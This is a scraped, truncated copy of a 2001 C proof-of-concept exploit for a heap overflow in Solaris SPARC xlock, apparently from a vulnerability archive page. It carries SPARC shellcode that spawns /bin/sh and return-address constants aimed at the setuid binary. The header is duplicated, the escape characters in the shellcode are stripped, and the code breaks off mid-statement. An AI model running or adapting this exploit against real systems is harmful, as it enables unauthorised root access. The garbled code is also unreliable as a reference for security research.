/*
* sol_sparc_xlockex.c - Proof of Concept Code for xlock heap overflow bug.
* Copyright (c) 2001 - Nsfocus.com
*
* Tested in Solaris 2.6/7/8 SPARC
* sol_sparc_xlockex.c - Proof of Concept Code for xlock heap overflow bug.
* Copyright (c) 2001 - Nsfocus.com
*
* Tested in Solaris 2.6/7/8 SPARC
*
* DISCLAIMS:
* This is a proof of concept code. This code is for test purpose
* only and should not be run against any host without permission from
* the system administrator.
*
* NSFOCUS Security Team <security@nsfocus.com>
* http://www.nsfocus.com
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/systeminfo.h>
#define RETLOC 0xffbee8c4 /* default "return address" location (Solaris 7) */
#define SP 0xffbefffc /* default "bottom" stack address (Solaris 7/8) */
#define VULPROG "/usr/openwin/bin/xlock"
#define NOP 0xaa1d4015 /* "xor %l5, %l5, %l5" */
char shellcode[] = /* from scz's shellcode for SPARC */
"x20xbfxffxffx20xbfxffxffx7fxffxffxffxaax1dx40x15"
"x81xc3xe0x14xaax1dx40x15xaax1dx40x15x90x08x3fxff"
"x82x10x20x8dx91xd0x20x08x90x08x3fxffx82x10x20x17"
"x91xd0x20x08x20x80x49x73x20x80x62x61x20x80x73x65"
"x20x80x3ax29x7fxffxffxffx94x1ax80x0ax90x03xe0x34"
"x92x0bx80x0ex9cx03xa0x08xd0x23xbfxf8xc0x23xbfxfc"
"xc0x2ax20x07x82x10x20x3bx91xd0x20x08x90x1bxc0x0f"
"x82x10x20x01x91xd0x20x08x2fx62x69x6ex2fx73x68xff";
/* get current stack point address */
long
get_sp(void)
{
__asm__("mov %sp,%i0");
}
long
get_shelladdr(long sp_addr, char **arg, char **env)
{
long retaddr;
int i;
char plat[256];
char pad = 0, pad1;
int env_len, arg_len, len;
/* calculate the length of "VULPROG" + argv[] */
for (i = 0, arg_len = 0; arg[i]!=NULL ; i++) {
arg_len += strlen(arg[i]) + 1;
}
/* calculate the pad nummber . */
pad = 3 - arg_len % 4;
printf("shellcode address padding = %d
", pad);
memset(env[0], 'A', pad);
env[0][pad] = '
xlock Heap Overflow For Solaris SPARC
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 336